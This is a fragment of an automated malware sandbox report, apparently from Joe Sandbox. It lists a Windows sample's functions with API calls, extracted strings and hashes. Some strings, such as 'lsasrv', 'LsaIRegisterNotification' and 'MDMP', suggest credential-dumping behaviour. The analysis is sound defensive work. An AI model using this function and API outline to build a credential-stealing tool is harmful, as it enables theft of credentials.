7ff73cfc34d8-7ff73cfc34de 382->388 383->369 384->346 386 7ff73cfc3435-7ff73cfc3438 384->386 386->346 386->383 388->343 389 7ff73cfc34e4-7ff73cfc3552 call 7ff73cfc3da8 388->389 391 7ff73cfc3557-7ff73cfc3559 389->391 391->343 392 7ff73cfc355b-7ff73cfc3576 391->392 392->336 392->343
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal$CloseFileHandle$CreateInitOpenProcessStringUnicodeUnmapView
                                                                      • String ID:
                                                                      • API String ID: 3774628339-0
                                                                      • Opcode ID: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                                                      • Instruction ID: 387836d66d092c20d7324e0cf1ad1d69091f9ee99f91f009bceb75821f466356
                                                                      • Opcode Fuzzy Hash: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                                                      • Instruction Fuzzy Hash: 3CA13E37B08643AAF714AF11E8846B8B7E0FB44784F948935D98D43798DF3DE44AA720
                                                                      Function 00007FF73CFC66BC Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 395 7ff73cfc66bc-7ff73cfc66fb GetStartupInfoW call 7ff73cfc7520 398 7ff73cfc6705-7ff73cfc671d 395->398 399 7ff73cfc66fd-7ff73cfc6700 395->399 400 7ff73cfc671f 398->400 401 7ff73cfc6764-7ff73cfc676a 398->401 402 7ff73cfc6970-7ff73cfc698d 399->402 403 7ff73cfc6723-7ff73cfc675c 400->403 404 7ff73cfc6770-7ff73cfc6778 401->404 405 7ff73cfc68a4-7ff73cfc68a7 401->405 403->403 406 7ff73cfc675e 403->406 404->405 407 7ff73cfc677e-7ff73cfc6794 404->407 408 7ff73cfc68aa-7ff73cfc68b6 405->408 406->401 409 7ff73cfc6821-7ff73cfc6826 407->409 410 7ff73cfc679a 407->410 411 7ff73cfc68c9-7ff73cfc68f2 GetStdHandle 408->411 412 7ff73cfc68b8-7ff73cfc68bd 408->412 409->405 413 7ff73cfc6828-7ff73cfc682d 409->413 414 7ff73cfc67a1-7ff73cfc67b1 call 7ff73cfc7520 410->414 416 7ff73cfc6941-7ff73cfc6946 411->416 417 7ff73cfc68f4-7ff73cfc68f7 411->417 412->411 415 7ff73cfc68bf-7ff73cfc68c4 412->415 419 7ff73cfc682f-7ff73cfc6834 413->419 420 7ff73cfc6897-7ff73cfc68a2 413->420 430 7ff73cfc67b3-7ff73cfc67ce 414->430 431 7ff73cfc681b 414->431 422 7ff73cfc694e-7ff73cfc695c 415->422 416->422 417->416 418 7ff73cfc68f9-7ff73cfc6904 GetFileType 417->418 418->416 423 7ff73cfc6906-7ff73cfc6910 418->423 419->420 424 7ff73cfc6836-7ff73cfc683b 419->424 420->405 420->413 422->408 426 7ff73cfc6962-7ff73cfc696e SetHandleCount 422->426 427 7ff73cfc6912-7ff73cfc6917 423->427 428 7ff73cfc6919-7ff73cfc691c 423->428 424->420 429 7ff73cfc683d-7ff73cfc6842 424->429 426->402 432 7ff73cfc6923-7ff73cfc6935 InitializeCriticalSectionAndSpinCount 427->432 428->432 433 7ff73cfc691e 428->433 434 7ff73cfc6852-7ff73cfc688e InitializeCriticalSectionAndSpinCount 429->434 435 7ff73cfc6844-7ff73cfc6850 GetFileType 429->435 436 7ff73cfc6811-7ff73cfc6817 430->436 437 7ff73cfc67d0 430->437 431->409 432->399 438 7ff73cfc693b-7ff73cfc693f 432->438 433->432 434->399 439 7ff73cfc6894 434->439 435->420 435->434 436->414 441 7ff73cfc6819 436->441 440 7ff73cfc67d4-7ff73cfc6809 437->440 438->422 439->420 440->440 442 7ff73cfc680b 440->442 441->409 442->436
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                      • String ID:
                                                                      • API String ID: 3473179607-0
                                                                      • Opcode ID: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                                                      • Instruction ID: 569424418123f441843b337d2a6f69b9a2f08b2f1b26a55b9b9721c9bc6f2ec3
                                                                      • Opcode Fuzzy Hash: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                                                      • Instruction Fuzzy Hash: 58816D63B09783A6EB14AF14D488329A7E0EF44B74F948B35DABD422D5DF38E455E320
                                                                      Function 00007FF73CFC1380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128librarymemoryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AddressAllocFreeHandleModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3402345641-3502785670
                                                                      • Opcode ID: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
                                                                      • Instruction ID: 53bd61f4d1572fedb77ded4968ad117cbf44ca851e18c330f0aceddc964708fa
                                                                      • Opcode Fuzzy Hash: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
                                                                      • Instruction Fuzzy Hash: 66515833B14A5795EB10EF66E8400ACA3B4FB48B88B988536DE8E53B48DF3DD411D360
                                                                      Function 00007FF73CFC59E4 Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FF73CFC5A0D
                                                                        • Part of subcall function 00007FF73CFC741C: _amsg_exit.LIBCMT ref: 00007FF73CFC7446
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5A40
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5A5E
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5A9E
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5AB8
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5AC8
                                                                      • ExitProcess.KERNEL32 ref: 00007FF73CFC5B54
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                                      • String ID:
                                                                      • API String ID: 3411037476-0
                                                                      • Opcode ID: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
                                                                      • Instruction ID: 38734e06cb4a2c5fea82207fae3cffc7b71361bd37ddf996d993a8640b1b3ea3
                                                                      • Opcode Fuzzy Hash: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
                                                                      • Instruction Fuzzy Hash: D4418233B09A43A1E644BB11EC84139E6D4FF88784F948935DACE477A5EF3CE495A720
                                                                      Function 00007FF73CFC245C Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
                                                                      • String ID:
                                                                      • API String ID: 366963940-0
                                                                      • Opcode ID: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                                                      • Instruction ID: 66a5400e1451b7bf3fa87226fa43655b6cf94bd8e8d62e667f08c4d457eef6d9
                                                                      • Opcode Fuzzy Hash: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                                                      • Instruction Fuzzy Hash: 35111C33A09A13B2E714AB10E8581A8B3E0FF44755FC04632D5AD466B9DF3DE549E724
                                                                      Function 00007FF73CFC6A00 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CreateInformationVersion
                                                                      • String ID:
                                                                      • API String ID: 3563531100-0
                                                                      • Opcode ID: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                                                      • Instruction ID: f3be11d54fee3aabe58cbb1e91de57a7bd5293f6772b1cd6d2cb215faa5ec9d1
                                                                      • Opcode Fuzzy Hash: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                                                      • Instruction Fuzzy Hash: AAE06D36B19A53A2FB88B710AC09775A290FF88340FC0D934E98F02794DF3CE045A620

                                                                      Non-executed Functions

                                                                      Function 00007FF73CFC5C00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                      • API String ID: 2183313154-4022980321
                                                                      • Opcode ID: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                                                      • Instruction ID: 0a06eac0f45287bbde0e3411129a38c5ff34b2a3e5d262fd67ce5eebe8fa61bc
                                                                      • Opcode Fuzzy Hash: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                                                      • Instruction Fuzzy Hash: 0151D227B1C68366F724F721A4156BAE2D1BF85784FC48935EECD43A85CF3CE105A620
                                                                      Function 00007FF73CFC71F0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3778485334-0
                                                                      • Opcode ID: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                                                      • Instruction ID: 009379b2e3e33e116173ace116da4374b30e269036c0ea5292ce9263ea99a3e9
                                                                      • Opcode Fuzzy Hash: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                                                      • Instruction Fuzzy Hash: 40310737A08B47A6E750AB54F84836AB3E0FB44354F918536DACE42768DF3CE045EB20
                                                                      Function 00007FF73CFC5540 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                                                      • Instruction ID: c7dcb387da3a35be4030fb4977bcef2732594f1210ceb89ac4702b39c13119d3
                                                                      • Opcode Fuzzy Hash: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                                                      • Instruction Fuzzy Hash: 91317F33B08B8296DB20EB25E8406AEB3E4FB84754F904535EADD43B95DF38D545DB10
                                                                      Function 00007FF73CFC8834 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                      • API String ID: 2643518689-564504941
                                                                      • Opcode ID: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
                                                                      • Instruction ID: 437191e89eb5b078181060a5767bfdaa7712f60c18d7cb134871191d3742623f
                                                                      • Opcode Fuzzy Hash: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
                                                                      • Instruction Fuzzy Hash: E5510C27B0AB07B1FE55BB11B858574A3D0AF45F84F858935CC8E43768EE3CB489A320
                                                                      Function 00007FF73CFC2518 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 169libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule$InitStringUnicode
                                                                      • String ID: Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification$cati$elNo$kernel32$lsasrv$tifi
                                                                      • API String ID: 3738668-3948219663
                                                                      • Opcode ID: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
                                                                      • Instruction ID: 5ca36fde2f920065126726a806a78fc5920ca3faeb4a9ef5a1e279ccd5600041
                                                                      • Opcode Fuzzy Hash: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
                                                                      • Instruction Fuzzy Hash: 48912C37B09B47AAEB00EF64D8846AC73F1EB44748F808435CA4D57768DE38E55AE360
                                                                      Function 00007FF73CFC3B74 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal$AddressHandleModuleProcwsprintf
                                                                      • String ID: %lS%lS%lS:%lS$WriteFile$kernel32
                                                                      • API String ID: 602150089-2677625405
                                                                      • Opcode ID: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                                                      • Instruction ID: 3450d20c7f2d54265cc6b11c9b9c552d6c26d78ccfe2c4dcad8152317a97a6a2
                                                                      • Opcode Fuzzy Hash: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                                                      • Instruction Fuzzy Hash: BC519467B09A47A1EA14FB12A8442B9A3E0FF44BC4F948935DD9E47364CF3CE549E350
                                                                      Function 00007FF73CFC1000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FreeLocal
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3514375268-3502785670
                                                                      • Opcode ID: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                                                      • Instruction ID: 95f7dfda3d052f03be01aa0f5f5787de7bc3e2f89847eb9f119c278185851775
                                                                      • Opcode Fuzzy Hash: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                                                      • Instruction Fuzzy Hash: 2C414F37B04B4395EB54AF16E844229A3E0FB88F94B94C935CE8E47354CE3EE859D310
                                                                      Function 00007FF73CFC3074 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC30DE
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC30EE
                                                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC31C2
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC31D2
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC3240
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC3249
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLocalModuleProc
                                                                      • String ID: KSSM$LocalAlloc$RUUU$kernel32
                                                                      • API String ID: 1697219777-2069434485
                                                                      • Opcode ID: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
                                                                      • Instruction ID: eac679ca17629d86a6a366f49afa4cb2cc1620491af591313ece2b9b51a115c8
                                                                      • Opcode Fuzzy Hash: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
                                                                      • Instruction Fuzzy Hash: 61515F33B14B63A6EB10EB61E8849A9B3B8FB44BC8B858435DE8D43754EF38D549D710
                                                                      Function 00007FF73CFC1534 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66filelibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                                                      • String ID: LocalAlloc$MDMP$kernel32
                                                                      • API String ID: 3734750734-1949004057
                                                                      • Opcode ID: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                                                      • Instruction ID: 8052fb2ba7517622061affed0d3af288e3ee676b93a83b6c17d1585933d52f91
                                                                      • Opcode Fuzzy Hash: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                                                      • Instruction Fuzzy Hash: AE217C37B08A4292EB14AF25E550129B3B1FB88F84B88C931CA8D47B14DF3DE866D710
